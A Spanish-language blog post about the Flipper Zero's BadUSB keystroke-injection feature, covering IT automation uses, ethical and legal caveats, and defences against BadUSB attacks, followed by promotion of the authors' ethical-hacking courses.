Aquí hay solo algunas ideas de cosas que puedes hacer con el Flipper Zero, pero realmente el cielo es el límite, ya que recuerda, un BAD USB emula un teclado, así que si puedes hacerlo con un teclado, puedes hacerlo con la funcionalidad USB defectuosa del Flipper Zero.

Configuración optimizada de la estación de trabajo

La configuración de nuevas computadoras puede ser a menudo una tarea tediosa que implica la instalación de software, configuraciones del sistema, la incorporación al dominio y la aplicación de configuraciones específicas. La función Bad USB puede automatizar estos procesos, lo que garantiza una configuración uniforme en varias estaciones de trabajo y ahorra horas de trabajo manual.

Implementación y actualizaciones de software eficientes

Mantener el software actualizado es fundamental, pero requiere mucho tiempo. Bad USB se puede utilizar para automatizar la implementación de actualizaciones en varias máquinas simultáneamente, lo que garantiza que todos los sistemas ejecuten las últimas versiones sin necesidad de realizar actualizaciones manuales individuales.

Automatización de tareas rutinarias de TI

Cosas como la configuración de ajustes de red, escaneos automáticos de virus, forzar actualizaciones de políticas de grupo, configurar conexiones VPN, etc., pueden automatizarse usando Bad USB. Esto no solo ahorra tiempo, sino que también garantiza que las tareas se realicen de manera consistente y sin errores.

Entrada y prueba rápida de datos

Para desarrolladores y analistas de datos, Bad USB puede automatizar la entrada de datos para probar aplicaciones de software o completar bases de datos, lo que permite procesos de prueba y análisis de datos más eficientes.

Propósitos educativos

En entornos educativos, Bad USB de Flipper Zero puede estandarizar la configuración de dispositivos para talleres o laboratorios de computación, lo que permite a los instructores centrarse en la enseñanza en lugar de en la preparación técnica.

Consideraciones éticas

Es fundamental utilizar la función Bad USB de Flipper Zero de forma ética. Asegúrate siempre de tener permiso antes de usarla en sistemas que no sean de tu propiedad, no confíes únicamente en los scripts que veas en Internet (lo ideal es que crees los tuyos propios o, al menos, que examines los que descargues) y prueba los scripts en un entorno controlado para evitar consecuencias no deseadas.

Preguntas frecuentes

¿Cuáles son los riesgos de seguridad asociados con el uso de la función Bad USB de Flipper Zero en entornos de TI y cómo se pueden mitigar?

El uso de la función USB defectuoso de Flipper Zero en entornos de TI plantea riesgos de seguridad, como posibles accesos no autorizados y cargas maliciosas. Para mitigar estos riesgos, asegúrese de que el dispositivo sea utilizado únicamente por personal autorizado, emplee controles de acceso estrictos y actualice periódicamente las políticas de seguridad para incluir el manejo de dichos dispositivos.

¿Se puede integrar Bad USB de Flipper Zero con las herramientas y flujos de trabajo de automatización de TI existentes y, de ser así, cómo?

Bad USB de Flipper Zero se puede integrar con herramientas de automatización de TI existentes mediante la creación de scripts personalizados compatibles con plataformas de automatización como PowerShell o Bash. Estos scripts se pueden implementar a través de Flipper Zero para agilizar las tareas rutinarias.

¿Cuáles son algunos ejemplos del mundo real o estudios de caso en los que Bad USB de Flipper Zero ha mejorado con éxito los flujos de trabajo de TI?

Algunos ejemplos en los que el Bad USB de Flipper Zero podría mejorar los flujos de trabajo de TI incluyen la automatización de tareas repetitivas como restablecimiento de contraseñas, instalaciones de software y configuraciones de red. Estos casos de uso demuestran cómo el dispositivo puede mejorar la eficiencia y reducir el esfuerzo manual en las operaciones de TI.

Cómo protegerse de los ataques BadUSB

Para protegerse de los ataques BadUSB, no hay mucho que se pueda hacer. Aparte de verificar todos los USB conectados a una computadora o restringir los dispositivos de entrada en función de la velocidad de escritura, no hay mucho que se pueda hacer al respecto.

Por eso son ataques tan aterradores, pero también se puede usar BadUSB para el bien. Por ejemplo, se puede usar para configurar una PC rápidamente mediante la incorporación de un montón de aplicaciones a la vez, o para ejecutar un montón de comandos que se necesitan en la computadora.

BadUSB tiene un montón de ventajas, pero como cualquier herramienta, también tiene muchas desventajas. Úselo con prudencia, pero experimente con él y vea lo que puede hacer.

Protegerse contra ataques BadUSB es fundamental para mantener la seguridad de los sistemas informáticos y la integridad de los datos. A continuación se presentan algunas estrategias y mejores prácticas para defenderse contra estos tipos de ataques:

Estrategias de Protección

  1. Políticas de Uso de Dispositivos USB
    • Restricciones de Uso: Limitar el uso de dispositivos USB desconocidos o no autorizados. Implementar políticas estrictas sobre qué dispositivos pueden ser conectados a las computadoras de la organización.
    • Asignación de USBs Seguros: Proveer dispositivos USB seguros y gestionados por la empresa para su uso oficial.
  2. Educación y Concienciación
    • Capacitación: Educar a los empleados y usuarios sobre los riesgos asociados con dispositivos USB desconocidos y la importancia de no conectar USBs de procedencia incierta.
    • Simulaciones de Ataques: Realizar simulaciones de ataques BadUSB para que los usuarios aprendan a reconocer y reaccionar adecuadamente ante estas amenazas.
  3. Soluciones Tecnológicas
    • Software de Seguridad: Utilizar software de seguridad que incluya protección contra dispositivos USB maliciosos. Algunas soluciones avanzadas pueden detectar y bloquear comportamientos sospechosos de dispositivos USB.
    • Actualizaciones de Sistema: Mantener el sistema operativo y el software de seguridad actualizados para protegerse contra nuevas vulnerabilidades.
  4. Control de Acceso Físico
    • Protección Física de Puertos USB: Utilizar bloqueadores de puertos USB para prevenir el acceso no autorizado a los puertos USB de las computadoras.
    • Vigilancia: Implementar medidas de seguridad física, como cámaras de vigilancia, para monitorear el acceso a áreas sensibles donde se encuentran los dispositivos importantes.
  5. Configuraciones del Sistema
    • Deshabilitar Puertos USB: Deshabilitar los puertos USB en computadoras que no necesiten utilizar dispositivos USB. Esta es una medida drástica pero efectiva para prevenir ataques.
    • Configurar Políticas de Grupo: Utilizar políticas de grupo en entornos de Windows para controlar y restringir el uso de dispositivos USB a nivel del sistema.
  6. Monitoreo y Respuesta
    • Monitoreo de Actividad: Implementar sistemas de monitoreo que detecten y alerten sobre comportamientos inusuales asociados con dispositivos USB.
    • Plan de Respuesta a Incidentes: Desarrollar y mantener un plan de respuesta a incidentes que incluya procedimientos específicos para manejar ataques BadUSB.

Buenas Prácticas

  • No Conectar USBs Desconocidos: Nunca conectar un dispositivo USB que se encuentre en lugares públicos o que provenga de una fuente no confiable.
  • Inspección de Dispositivos USB: Antes de utilizar un dispositivo USB, realizar una inspección visual y, si es posible, utilizar herramientas de escaneo para verificar su integridad.
  • Desconectar USBs Inactivos: Desconectar los dispositivos USB cuando no estén en uso para minimizar la ventana de oportunidad para un ataque.

La función BadUSB en Flipper Zero es una poderosa herramienta que puede ser utilizada tanto para fines educativos y de pruebas de seguridad como para actividades maliciosas si cae en manos equivocadas. Es esencial comprender los riesgos y manejar el dispositivo con responsabilidad, asegurando que se utilice únicamente en entornos y situaciones donde se tenga el permiso adecuado. La educación y la concienciación sobre este tipo de ataques son cruciales para mitigar los riesgos y proteger la integridad de los sistemas informáticos.

Conclusión

Si bien los ataques de USB maliciosos representan una amenaza grave para la seguridad, herramientas como Flipper Zero pueden ser fundamentales para identificar dichas vulnerabilidades. Al emular estos ataques de manera controlada, las organizaciones pueden estar un paso adelante y rectificar estas vulnerabilidades antes de los atacantes las exploten. Al igual que con todas las herramientas de prueba de penetración, es importante recordar que deben usarse de manera ética y responsable, con el objetivo de mejorar la seguridad en lugar de comprometerla.

Protegerse contra ataques BadUSB requiere una combinación de políticas organizativas, soluciones tecnológicas, educación y buenas prácticas de seguridad. Al implementar estas medidas, las organizaciones y los individuos pueden reducir significativamente el riesgo de ser víctimas de ataques BadUSB y mantener la integridad y seguridad de sus sistemas informáticos. La concienciación continua y la vigilancia son esenciales para adaptarse a las amenazas emergentes y proteger eficazmente los datos.

La función USB Zero Bad de Flipper no solo se centra en explotar vulnerabilidades, sino que también es una herramienta poderosa para los profesionales de TI que buscan mejorar la eficiencia y la productividad. Al automatizar tareas rutinarias, les permite liberar tiempo para proyectos más complejos y gratificantes, lo que transforma el panorama de los flujos de trabajo de TI.

A medida que continuamos explorando y comprendiendo sus capacidades, Flipper Zero se destaca como un faro de innovación en el mundo de la tecnología, demostrando que, a veces, lo “malo” puede ser realmente bueno.

Si deseas que publique algunos scripts de ejemplo o que haga un artículo o vídeo de demostración, deja un comentario.

Descargo de responsabilidad: 

Esta publicación de blog tiene fines informativos únicamente. No fomenta ni respalda ninguna actividad ilegal o poco ética relacionada con el hacking o el uso indebido de dispositivos y dispositivos de hacking. La información proporcionada aquí tiene como objetivo promover el uso responsable y legal de la tecnología con fines educativos y de seguridad.

Respete siempre las leyes, regulaciones y pautas éticas locales cuando trabaje con herramientas y dispositivos de hacking. Se desaconseja encarecidamente el uso no autorizado o cualquier acción que viole la privacidad, comprometa la seguridad o cause daño y puede tener consecuencias legales.

Consideraciones legales

Flipper Zero es una poderosa herramienta diseñada para uso educativo y profesional. Se anima a los lectores a cumplir con todas las leyes y directrices éticas aplicables al utilizar dichos dispositivos.

Asegúrese de utilizar estas herramientas de manera ética y dentro de los límites de la ley. Las pruebas de penetración sólo deben realizarse en redes con el permiso explícito del propietario.

No te detengas, sigue avanzando

Aquí tienes un propósito para este 2024 que debes considerar seriamente: si has querido mejorar tus habilidades en hacking, Ciberseguridad y programación ahora es definitivamente el momento de dar el siguiente paso. ¡Desarrolla tus habilidades aprovechando nuestros cursos a un precio increíble y avanza en tu carrera! El mundo necesita más hackers…

Universidad Hacking. Todo en Ciberseguridad. Curso Completo

Aprende Hacking Ético y Ciberseguridad sin necesitar conocimientos Previos. Practica Hacking Ético y Ciberseguridad aquí

Calificación: 4,6 de 5 (2.877 calificaciones) 15.284 estudiantes Creado por Alvaro Chirou • 1.800.000+ Enrollments Worldwide

Lo que aprenderás

  • Seguridad informática
  • Hacking Ético en profundidad
  • Redes
  • Programación (Python) (Hacking con Python)
  • Análisis de Malware con laboratorios, practicas y ejecución de Malware para que veas su comportamiento.
  • Cómo reforzar tu Privacidad y Anonimato
  • Uso avanzado de Metasploit
  • Top 10 de Owasp Web, Top 10 de Owasp mobile y Top 10 de Owasp API
  • Seguridad informática para empresas
  • Kali linux de 0 a 100, Veremos su suite de herramientas de hacking y como explotar fallos en sistemas.
  • Termux y como hackear desde el celular
  • Seguridad informática server/web, profundizaremos en WordPress
  • Análisis de trafico en Wireshark
  • Y mucho, pero mucho más

¿Esto que significa?

Hoy más que nunca, se necesitan personas capacitadas en este rubro para trabajar.

Por esa razón cree esta formación profesional para compartirte mis conocimientos y experiencia en la materia y puedas iniciar en este mundo del Hacking Ético y Ciberseguridad.

Te voy a estar acompañando en el proceso de aprendizaje, donde si estas empezando desde 0, sin conocimientos previos, no es un impedimento ya que iniciaremos como si no supieras nada de la materia.

Si sos una persona con conocimientos, podrás iniciar directamente en el nivel más avanzado o en el que tu elijas.

Como en todos mis cursos en udemy, tendrás muchísima practica para que materialices lo que vas aprendiendo.

Empieza a aprender ya mismo!

Aprende con nuestros más de 100 cursos que tenemos disponibles para vos

No solo te enseñamos, tambien te guíamos para que puedas conseguir trabajo como desarrollador y hacker…

¿Te gustaría enterarte de cuando lanzamos descuentos y nuevos cursos?

Sobre los autores

Álvaro Chirou

Yo soy Álvaro Chirou, tengo más de 20 Años de experiencia trabajando en Tecnología, eh dado disertaciones en eventos internacionales como OWASP, tengo más de 1.800.000 estudiantes en Udemy y 100 formaciones profesionales impartidas en la misma. Puedes seguirme en mis redes:

Laprovittera Carlos

Soy Laprovittera Carlos. Con más de 20 años de experiencia en IT brindo Educación y Consultoría en Seguridad de la Información para profesionales, bancos y empresas. Puedes saber más de mi y de mis servicios en mi sitio web: laprovittera.com y seguirme en mis redes:

¿Quieres iniciarte en hacking y ciberseguridad pero no sabes por dónde empezar? Inicia leyendo nuestra guia gratuita: https://achirou.com/como-iniciarse-en-ciberseguridad-y-hacking-en-2024/ que te lleva de 0 a 100. Desde los fundamentos más básicos, pasando por cursos, recursos y certificaciones hasta cómo obtener tu primer empleo.

SIGUE APRENDIENDO GRATIS CON NUESTRAS GUIAS

Cómo Iniciarse en Hacking y Ciberseguridad en 2024

Curso Gratis de Programación

Curso Gratis Linux – Capitulo 1 – Introducción a Linux

Curso Gratis de Redes – Capitulo 1 – Tipos de redes y servicios

Como iniciarse en TRY HACK ME – Complete Beginner #1

OSINT #1 Más de 200 Search Tools

Curso Gratis de Java para Hackers

SIGUE APRENDIENDO GRATIS EN NUESTRO BLOG

Saludos amigos y happy hacking!!!